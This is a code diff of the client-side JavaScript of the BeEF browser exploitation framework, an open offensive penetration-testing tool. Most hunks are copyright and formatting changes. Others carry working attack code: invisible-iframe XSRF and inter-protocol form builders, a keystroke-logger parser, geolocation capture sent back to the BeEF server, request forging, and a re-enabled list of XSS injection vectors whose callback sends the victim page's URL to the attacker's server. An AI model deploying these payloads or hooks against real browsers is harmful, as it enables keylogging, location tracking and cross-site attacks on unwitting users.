-                content += beef.dom.parseAppletParams(params);
+//            if (params != null) {
-            }
+//                content += beef.dom.parseAppletParams(params);
-            content += "</embed>";
+//            }
-        }
+//            content += "</embed>";
 //        }
        $j('body').append(content);
    },
@@ -344,15 +446,17 @@ beef.dom = {
     * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
     * @params: {String} action: the form action attribute, where the request will be sent.
     * @params: {String} method: HTTP method, usually POST.
     * @params: {String} enctype: form encoding type
     * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
     *         example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
     */
-    createIframeXsrfForm: function(action, method, inputs){
+    createIframeXsrfForm: function(action, method, enctype, inputs){
        var iframeXsrf = beef.dom.createInvisibleIframe();
        var formXsrf = document.createElement('form');
-        formXsrf.setAttribute('action', action);
+        formXsrf.setAttribute('action',  action);
-        formXsrf.setAttribute('method', method);
+        formXsrf.setAttribute('method',  method);
        formXsrf.setAttribute('enctype', enctype);
        var input = null;
        for (i in inputs){
@@ -375,11 +479,11 @@ beef.dom = {
     * @params: {String} rport: remote port
     * @params: {String} commands: protocol commands to be executed by the remote host:port service
     */
-    createIframeIpecForm: function(rhost, rport, commands){
+    createIframeIpecForm: function(rhost, rport, path, commands){
        var iframeIpec = beef.dom.createInvisibleIframe();
        var formIpec = document.createElement('form');
-        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
        formIpec.setAttribute('method',  'POST');
        formIpec.setAttribute('enctype', 'multipart/form-data');
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -32,14 +32,14 @@ beef.geolocation = {
        $j.ajax({
            error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                beef.net.send(command_url, command_id, "latitude=" + latitude
                             + "&longitude=" + longitude
                             + "&osm=UNAVAILABLE"
                             + "&geoLocEnabled=True");
                },
            success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                var jsonResp = $j.parseJSON(data);
                beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
        navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
        		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -126,4 +126,4 @@ beef.hardware = {
 	}
 };
-beef.regCmp('beef.net.hardware');
+beef.regCmp('beef.hardware');
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -13,7 +13,8 @@
 * and will have a new session id. The new session id will need to know
 * the brwoser details. So sendback the browser details again.
 */
-BEEFHOOK = beef.session.get_hook_session_id();
+
 beef.session.get_hook_session_id();
 if (beef.pageIsLoaded) {
    beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
            try {
                callback(event);
            } catch (e) {
-                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
            }
            return false;
        }
@@ -46,7 +47,7 @@ window.onclose = function (event) {
            try {
                callback(event);
            } catch (e) {
-                console.log("window.onclose - couldn't execute callback: " + e.message);
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
            }
            return false;
        }
--- a/core/main/client/lib/deployJava.js
+++ b/core/main/client/lib/deployJava.js
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/lib/jquery-1.10.2.min.js
+++ b/core/main/client/lib/jquery-1.10.2.min.js
--- a/core/main/client/lib/jquery-migrate-1.2.1.min.js
+++ b/core/main/client/lib/jquery-migrate-1.2.1.min.js
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -43,6 +43,7 @@ beef.logger = {
        this.y = 0;
        this.target = null;
        this.data = null;
        this.mods = null;
    },
 	/**
@@ -233,17 +234,28 @@ beef.logger = {
 	 */
 	parse_stream: function() {
 		var s = '';
-		for (var i in this.stream)
+        var mods = '';
-		{
+		for (var i in this.stream){
-			//s += (this.stream[i]['modifiers']['alt']) ? '*alt* ' : '';
+         try{
-			//s += (this.stream[i]['modifiers']['ctrl']) ? '*ctrl* ' : '';
+            var mod = this.stream[i]['modifiers'];
-			//s += (this.stream[i]['modifiers']['shift']) ? 'Shift+' : '';
+            s += String.fromCharCode(this.stream[i]['char']);
-			s += String.fromCharCode(this.stream[i]['char']);
+            if(typeof mod != 'undefined' &&
                      (mod['alt'] == true ||
                      mod['ctrl'] == true ||
                      mod['shift'] == true)){
                mods += (mod['alt']) ? ' [Alt] ' : '';
                mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
                mods += (mod['shift']) ? ' [Shift] ' : '';
                mods += String.fromCharCode(this.stream[i]['char']);
            }
         }catch(e){}
 		}
        var k = new beef.logger.e();
        k.type = 'keys';
        k.target = beef.logger.get_dom_identifier();
        k.data = s;
        k.mods = mods;
        return k;
 	},
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -18,21 +18,21 @@
 */
 beef.net = {
-    host:"<%= @beef_host %>",
+    host: "<%= @beef_host %>",
-    port:"<%= @beef_port %>",
+    port: "<%= @beef_port %>",
-    hook:"<%= @beef_hook %>",
+    hook: "<%= @beef_hook %>",
-    httpproto:"<%= @beef_proto %>",
+    httpproto: "<%= @beef_proto %>",
-    handler:'/dh',
+    handler: '/dh',
-    chop:500,
+    chop: 500,
-    pad:30, //this is the amount of padding for extra params such as pc, pid and sid
+    pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
-    sid_count:0,
+    sid_count: 0,
-    cmd_queue:[],
+    cmd_queue: [],
    /**
     * Command object. This represents the data to be sent back to BeEF,
     * using the beef.net.send() method.
     */
-    command:function () {
+    command: function () {
        this.cid = null;
        this.results = null;
        this.handler = null;
@@ -42,7 +42,7 @@ beef.net = {
    /**
     * Packet object. A single chunk of data. X packets -> 1 stream
     */
-    packet:function () {
+    packet: function () {
        this.id = null;
        this.data = null;
    },
@@ -50,7 +50,7 @@ beef.net = {
    /**
     * Stream object. Contains X packets, which are command result chunks.
     */
-    stream:function () {
+    stream: function () {
        this.id = null;
        this.packets = [];
        this.pc = 0;
@@ -58,8 +58,8 @@ beef.net = {
            return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
        };
        this.get_packet_data = function () {
-             var p = this.packets.shift();
+            var p = this.packets.shift();
-             return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
+            return {'bh': beef.session.get_hook_session_id(), 'sid': this.id, 'pid': p.id, 'pc': this.pc, 'd': p.data }
        };
    },
@@ -68,7 +68,7 @@ beef.net = {
     * NOTE: as we are using async mode, the response object will be empty if returned.
     * Using sync mode, request obj fields will be populated.
     */
-    response:function () {
+    response: function () {
        this.status_code = null;        // 500, 404, 200, 302
        this.status_text = null;        // success, timeout, error, ...
        this.response_body = null;      // "<html>…." if not a cross domain request
@@ -86,7 +86,7 @@ beef.net = {
     * @param: {String} results: the data to send
     * @param: {Function} callback: the function to call after execution
     */
-    queue:function (handler, cid, results, callback) {
+    queue: function (handler, cid, results, callback) {
        if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
            var s = new beef.net.command();
            s.cid = cid;
@@ -107,16 +107,16 @@ beef.net = {
     * @param: {String} results: the data to send
     * @param: {Function} callback: the function to call after execution
     */
-    send:function (handler, cid, results, callback) {
+    send: function (handler, cid, results, callback) {
        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
            this.queue(handler, cid, results, callback);
            this.flush();
-        }else {
+        } else {
            try {
                beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                    '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
                    '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
-            }catch (e) {
+            } catch (e) {
                this.queue(handler, cid, results, callback);
                this.flush();
            }
@@ -131,7 +131,7 @@ beef.net = {
     * XHR-polling mechanism. If WebSockets are used, the data is sent
     * back to BeEF straight away.
     */
-    flush:function () {
+    flush: function () {
        if (this.cmd_queue.length > 0) {
            var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
            this.cmd_queue.length = 0;
@@ -159,7 +159,7 @@ beef.net = {
     * @param: {String} str: the input data
     * @param: {Integer} amount: chunk length
     */
-    chunk:function (str, amount) {
+    chunk: function (str, amount) {
        if (typeof amount == 'undefined') n = 2;
        return str.match(RegExp('.{1,' + amount + '}', 'g'));
    },
@@ -169,7 +169,7 @@ beef.net = {
     * It uses beef.net.request to send back the data.
     * @param: {Object} stream: the stream object to be sent back.
     */
-    push:function (stream) {
+    push: function (stream) {
        //need to implement wait feature here eventually
        for (var i = 0; i < stream.pc; i++) {
            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
@@ -191,11 +191,11 @@ beef.net = {
     *
     * @return: {Object} response: this object contains the response details
     */
-    request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
+    request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
        //check if same domain or cross domain
        var cross_domain = true;
-		if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
-            if(document.location.port == "" || document.location.port == null){
+            if (document.location.port == "" || document.location.port == null) {
                cross_domain = !(port == "80" || port == "443");
            }
        }
@@ -220,29 +220,29 @@ beef.net = {
         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
         * This will turn POSTs into GETs for remote-domain requests.
         */
-        if (method == "POST"){
+        if (method == "POST") {
-           $j.ajaxSetup({
+            $j.ajaxSetup({
-              dataType: dataType
+                dataType: dataType
-           });
+            });
        } else {
-           $j.ajaxSetup({
+            $j.ajaxSetup({
                dataType: 'script'
-           });
+            });
        }
        //build and execute the request
-        $j.ajax({type:method,
+        $j.ajax({type: method,
-            url:url,
+            url: url,
-            data:data,
+            data: data,
-            timeout:(timeout * 1000),
+            timeout: (timeout * 1000),
            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
-            beforeSend:function (xhr) {
+            beforeSend: function (xhr) {
                if (method == "POST") {
                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                }
            },
-            success:function (data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                var end_time = new Date().getTime();
                response.status_code = xhr.status;
                response.status_text = textStatus;
@@ -251,14 +251,14 @@ beef.net = {
                response.was_timedout = false;
                response.duration = (end_time - start_time);
            },
-            error:function (jqXHR, textStatus, errorThrown) {
+            error: function (jqXHR, textStatus, errorThrown) {
                var end_time = new Date().getTime();
                response.response_body = jqXHR.responseText;
                response.status_code = jqXHR.status;
                response.status_text = textStatus;
                response.duration = (end_time - start_time);
            },
-            complete:function (jqXHR, textStatus) {
+            complete: function (jqXHR, textStatus) {
                response.status_code = jqXHR.status;
                response.status_text = textStatus;
                response.headers = jqXHR.getAllResponseHeaders();
@@ -288,19 +288,20 @@ beef.net = {
     *
     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
     */
-    forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
        // check if same domain or cross domain
        var cross_domain = true;
-
+        if (domain == "undefined" || path == "undefined") {
-        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
+            return;
-           if(document.location.port == "" || document.location.port == null){
+        }
-               cross_domain = !(port == "80" || port == "443");
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
-           } else {
+            if (document.location.port == "" || document.location.port == null) {
-              if (document.location.port == port) cross_domain = false;
+                cross_domain = !(port == "80" || port == "443");
-           }
+            } else {
                if (document.location.port == port) cross_domain = false;
            }
        }
        // build the url
        var url = "";
        if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
@@ -333,7 +334,7 @@ beef.net = {
         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
         * This will turn POSTs into GETs for remote-domain requests.
         */
-        if (method == "POST"){
+        if (method == "POST") {
            $j.ajaxSetup({
                dataType: dataType
            });
@@ -343,8 +344,8 @@ beef.net = {
            });
        }
-		// this is required for bugs in IE so data can be transferred back to the server
+        // this is required for bugs in IE so data can be transferred back to the server
-        if ( beef.browser.isIE() ) {
+        if (beef.browser.isIE()) {
            dataType = 'script'
        }
@@ -355,14 +356,14 @@ beef.net = {
            timeout: (timeout * 1000),
            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
-            beforeSend:function (xhr) {
+            beforeSend: function (xhr) {
                if (method == "POST") {
                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                }
            },
            // http server responded successfully
-            success:function (data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                var end_time = new Date().getTime();
                response.status_code = xhr.status;
                response.status_text = textStatus;
@@ -373,7 +374,7 @@ beef.net = {
            // server responded with a http error (403, 404, 500, etc)
            // or server is not a http server
-            error:function (xhr, textStatus, errorThrown) {
+            error: function (xhr, textStatus, errorThrown) {
                var end_time = new Date().getTime();
                response.response_body = xhr.responseText;
                response.status_code = xhr.status;
@@ -381,33 +382,33 @@ beef.net = {
                response.duration = (end_time - start_time);
            },
-            complete:function (xhr, textStatus) {
+            complete: function (xhr, textStatus) {
                // cross-domain request
                if (cross_domain) {
-					response.port_status = "crossdomain";
+                    response.port_status = "crossdomain";
                    if (xhr.status != 0) {
-						response.status_code = xhr.status;
+                        response.status_code = xhr.status;
-					} else {
+                    } else {
-						response.status_code = -1;
+                        response.status_code = -1;
-					}
+                    }
-					if (textStatus) {
+                    if (textStatus) {
-                    	response.status_text = textStatus;
+                        response.status_text = textStatus;
-					} else {
+                    } else {
-						response.status_text = "crossdomain";
+                        response.status_text = "crossdomain";
-					}
+                    }
-					if (xhr.getAllResponseHeaders()) {
+                    if (xhr.getAllResponseHeaders()) {
-	                    response.headers = xhr.getAllResponseHeaders();
+                        response.headers = xhr.getAllResponseHeaders();
-					} else {
+                    } else {
-						response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                        response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-					}
+                    }
-					if (!response.response_body) {
+                    if (!response.response_body) {
-						response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                        response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-					}
+                    }
                } else {
                    // same-domain request
@@ -420,8 +421,16 @@ beef.net = {
                        response.was_timedout = true;
                        response.response_body = "ERROR: Timed out\n";
                        response.port_status = "closed";
                        /*
                         * With IE we need to explicitly set the dataType to "script",
                         * so there will be always parse-errors if the content is != javascript
                         * */
                    } else if (textStatus == "parsererror") {
                        response.port_status = "not-http";
                        if (beef.browser.isIE()) {
                            response.status_text = "success";
                            response.port_status = "open";
                        }
                    } else {
                        response.port_status = "open";
                    }
@@ -434,7 +443,7 @@ beef.net = {
    //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
    //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
-    clean:function (r) {
+    clean: function (r) {
        if (this.array_has_string_key(r)) {
            var obj = {};
            for (var key in r)
@@ -445,7 +454,7 @@ beef.net = {
    },
    //Detects if an array has a string key
-    array_has_string_key:function (arr) {
+    array_has_string_key: function (arr) {
        if ($j.isArray(arr)) {
            try {
                for (var key in arr)
@@ -459,7 +468,7 @@ beef.net = {
    /**
     * Sends back browser details to framework, calling beef.browser.getDetails()
     */
-    browser_details:function () {
+    browser_details: function () {
        var details = beef.browser.getDetails();
        details['HookSessionID'] = beef.session.get_hook_session_id();
        this.send('/init', 0, details);
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -43,7 +43,7 @@ beef.net.dns = {
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }
--- a/core/main/client/net/local.js
+++ b/core/main/client/net/local.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/net/portscanner.js
+++ b/core/main/client/net/portscanner.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/net/requester.js
+++ b/core/main/client/net/requester.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -19,8 +19,7 @@ beef.net.requester = {
 	handler: "requester",
 	send: function(requests_array) {
-
+        for(var i=0; i<requests_array.length; i++){
        for (i in requests_array) {
            request = requests_array[i];
            beef.net.forge_request('http', request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
@@ -32,8 +31,6 @@ beef.net.requester = {
                                           response_headers: res.headers});
                                       }
                                 );
        }
    }
 };
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -49,22 +49,20 @@ beef.net.xssrays = {
    //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
    vectors: [
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
    // util function. Print string to the console only if the debug flag is on and the browser is not IE.
    printDebug:function(log) {
        if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
        }
    },
@@ -340,8 +338,8 @@ beef.net.xssrays = {
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
                        exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
                beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
                exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                        beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
                        exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                        form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/session.js
+++ b/core/main/client/session.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -13,7 +13,8 @@ beef.session = {
 	hook_session_id_length: 80,
